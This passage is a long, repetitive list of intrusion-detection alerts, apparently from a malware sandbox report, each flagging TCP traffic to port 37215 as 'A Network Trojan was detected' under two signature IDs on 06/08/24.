          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552025
          SID:2829579
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275412
          SID:2835222
          Source Port:37204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258499
          SID:2835222
          Source Port:33624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709683
          SID:2829579
          Source Port:54840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741750
          SID:2835222
          Source Port:57186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897420
          SID:2835222
          Source Port:56364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.145327
          SID:2829579
          Source Port:49220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040254
          SID:2829579
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058103
          SID:2829579
          Source Port:37828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832419
          SID:2829579
          Source Port:56720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736692
          SID:2835222
          Source Port:60068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151494
          SID:2835222
          Source Port:45938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460681
          SID:2829579
          Source Port:38850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408793
          SID:2835222
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705554
          SID:2835222
          Source Port:52412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549996
          SID:2835222
          Source Port:60268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160747
          SID:2829579
          Source Port:50412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129454
          SID:2835222
          Source Port:49864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185475
          SID:2835222
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860988
          SID:2829579
          Source Port:39048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351326
          SID:2835222
          Source Port:45070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.125921
          SID:2835222
          Source Port:38582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262276
          SID:2835222
          Source Port:49602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465308
          SID:2835222
          Source Port:48936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441866
          SID:2829579
          Source Port:56090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829471
          SID:2835222
          Source Port:56000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355147
          SID:2835222
          Source Port:56246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.856854
          SID:2835222
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355370
          SID:2835222
          Source Port:43638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788156
          SID:2829579
          Source Port:47568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602940
          SID:2835222
          Source Port:54944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542412
          SID:2829579
          Source Port:36310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897245
          SID:2835222
          Source Port:33092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403609
          SID:2835222
          Source Port:45480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548501
          SID:2835222
          Source Port:53526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553117
          SID:2835222
          Source Port:47110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861232
          SID:2835222
          Source Port:41190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132893
          SID:2829579
          Source Port:56738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515690
          SID:2835222
          Source Port:60208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.472018
          SID:2835222
          Source Port:56154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159811
          SID:2829579
          Source Port:48884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461204
          SID:2829579
          Source Port:56792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804161
          SID:2829579
          Source Port:45226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781617
          SID:2829579
          Source Port:41998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039585
          SID:2829579
          Source Port:58848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160510
          SID:2829579
          Source Port:38008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513672
          SID:2835222
          Source Port:53160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133139
          SID:2829579
          Source Port:55256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860297
          SID:2835222
          Source Port:52776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467006
          SID:2829579
          Source Port:48798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264830
          SID:2829579
          Source Port:53668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352925
          SID:2835222
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819129
          SID:2835222
          Source Port:51160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888295
          SID:2829579
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787427
          SID:2835222
          Source Port:35926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739870
          SID:2835222
          Source Port:42838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079014
          SID:2829579
          Source Port:43814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854184
          SID:2835222
          Source Port:34824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461742
          SID:2829579
          Source Port:57532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179250
          SID:2835222
          Source Port:38824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804310
          SID:2835222
          Source Port:38872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161459
          SID:2835222
          Source Port:55124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173412
          SID:2829579
          Source Port:37202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115925
          SID:2835222
          Source Port:56914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038291
          SID:2835222
          Source Port:51462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745767
          SID:2835222
          Source Port:45552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021512
          SID:2829579
          Source Port:34462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464733
          SID:2829579
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175938
          SID:2829579
          Source Port:46078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732454
          SID:2829579
          Source Port:37500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075070
          SID:2829579
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465001
          SID:2829579
          Source Port:34608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148546
          SID:2835222
          Source Port:41554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808842
          SID:2835222
          Source Port:38694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668204
          SID:2829579
          Source Port:51142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020939
          SID:2829579
          Source Port:42304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260734
          SID:2829579
          Source Port:44472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673435
          SID:2835222
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036262
          SID:2835222
          Source Port:39472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070919
          SID:2835222
          Source Port:33720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269147
          SID:2829579
          Source Port:40772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353622
          SID:2829579
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517118
          SID:2835222
          Source Port:55228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059608
          SID:2835222
          Source Port:53236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262249
          SID:2835222
          Source Port:60176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178757
          SID:2829579
          Source Port:34856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466982
          SID:2829579
          Source Port:44116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187832
          SID:2829579
          Source Port:59542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738597
          SID:2829579
          Source Port:42012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546577
          SID:2829579
          Source Port:33304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161169
          SID:2829579
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176436
          SID:2829579
          Source Port:40830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.886932
          SID:2835222
          Source Port:38484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057868
          SID:2835222
          Source Port:50300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820718
          SID:2835222
          Source Port:50636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673180
          SID:2835222
          Source Port:33752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599569
          SID:2835222
          Source Port:49318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747274
          SID:2829579
          Source Port:51518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131142
          SID:2835222
          Source Port:50578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115248
          SID:2829579
          Source Port:46904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276589
          SID:2829579
          Source Port:51438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465010
          SID:2829579
          Source Port:35946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732073
          SID:2829579
          Source Port:49592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671834
          SID:2835222
          Source Port:50326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005612
          SID:2829579
          Source Port:47160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257548
          SID:2835222
          Source Port:40534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832268
          SID:2829579
          Source Port:37546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178617
          SID:2835222
          Source Port:58866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035046
          SID:2829579
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017670
          SID:2835222
          Source Port:44036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352100
          SID:2835222
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.293401
          SID:2835222
          Source Port:40682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672410
          SID:2835222
          Source Port:44810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018286
          SID:2829579
          Source Port:52116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295380
          SID:2829579
          Source Port:34894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174143
          SID:2835222
          Source Port:40392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509993
          SID:2829579
          Source Port:35620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067806
          SID:2835222
          Source Port:38886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912404
          SID:2835222
          Source Port:53150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704525
          SID:2835222
          Source Port:36976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780670
          SID:2829579
          Source Port:40830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042706
          SID:2829579
          Source Port:48272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276524
          SID:2829579
          Source Port:39434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464103
          SID:2829579
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044754
          SID:2829579
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739159
          SID:2829579
          Source Port:35520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017246
          SID:2829579
          Source Port:48606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016925
          SID:2829579
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791617
          SID:2829579
          Source Port:38854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819293
          SID:2829579
          Source Port:39478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511029
          SID:2835222
          Source Port:33742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354146
          SID:2835222
          Source Port:60332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747581
          SID:2829579
          Source Port:57156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258730
          SID:2835222
          Source Port:42934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602820
          SID:2829579
          Source Port:34750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549181
          SID:2835222
          Source Port:52766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518446
          SID:2835222
          Source Port:42528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734665
          SID:2835222
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516730
          SID:2835222
          Source Port:50740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515885
          SID:2829579
          Source Port:59800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085000
          SID:2829579
          Source Port:59142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151436
          SID:2829579
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739868
          SID:2835222
          Source Port:41646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835471
          SID:2829579
          Source Port:52346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233501
          SID:2835222
          Source Port:53916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109074
          SID:2829579
          Source Port:39102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257732
          SID:2835222
          Source Port:36748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705967
          SID:2829579
          Source Port:57898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402476
          SID:2829579
          Source Port:49206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296871
          SID:2829579
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461253
          SID:2835222
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352821
          SID:2829579
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067996
          SID:2829579
          Source Port:50190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406270
          SID:2835222
          Source Port:42144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410668
          SID:2829579
          Source Port:35788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741050
          SID:2835222
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706856
          SID:2835222
          Source Port:51308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.913619
          SID:2829579
          Source Port:37036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173432
          SID:2835222
          Source Port:48652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730067
          SID:2835222
          Source Port:43006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270893
          SID:2835222
          Source Port:37734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786725
          SID:2829579
          Source Port:41200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160683
          SID:2829579
          Source Port:50498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789846
          SID:2829579
          Source Port:43446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274780
          SID:2829579
          Source Port:55986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672641
          SID:2835222
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901876
          SID:2829579
          Source Port:37476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135408
          SID:2835222
          Source Port:46908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673102
          SID:2835222
          Source Port:58026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672407
          SID:2835222
          Source Port:58372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515939
          SID:2829579
          Source Port:41102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025997
          SID:2829579
          Source Port:35750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039307
          SID:2829579
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734437
          SID:2829579
          Source Port:34394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894471
          SID:2835222
          Source Port:34632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553188
          SID:2829579
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815153
          SID:2835222
          Source Port:39220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704425
          SID:2829579
          Source Port:33438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819098
          SID:2835222
          Source Port:55100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160247
          SID:2835222
          Source Port:43704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730804
          SID:2835222
          Source Port:57870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513303
          SID:2835222
          Source Port:50926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708000
          SID:2835222
          Source Port:38918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795102
          SID:2835222
          Source Port:49068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741175
          SID:2835222
          Source Port:53592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042137
          SID:2835222
          Source Port:38790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107736
          SID:2829579
          Source Port:57950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378286
          SID:2835222
          Source Port:53260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165897
          SID:2829579
          Source Port:38480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351903
          SID:2835222
          Source Port:50808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444893
          SID:2829579
          Source Port:36842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512142
          SID:2835222
          Source Port:45424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739455
          SID:2835222
          Source Port:48480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846713
          SID:2829579
          Source Port:55916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893889
          SID:2835222
          Source Port:53356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704948
          SID:2829579
          Source Port:44780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356707
          SID:2829579
          Source Port:41860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
